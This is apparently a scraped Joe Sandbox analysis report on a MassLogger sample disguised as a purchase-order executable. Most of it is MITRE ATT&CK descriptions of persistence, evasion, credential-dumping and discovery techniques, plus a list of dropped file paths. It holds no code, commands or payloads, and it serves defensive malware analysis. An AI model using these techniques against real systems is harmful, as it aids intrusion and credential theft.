Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Drive: Drive Access, File: File Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO_2024_056209_MQ04865_ENQ_1045.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Windows Analysis Report
PO_2024_056209_MQ04865_ENQ_1045.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre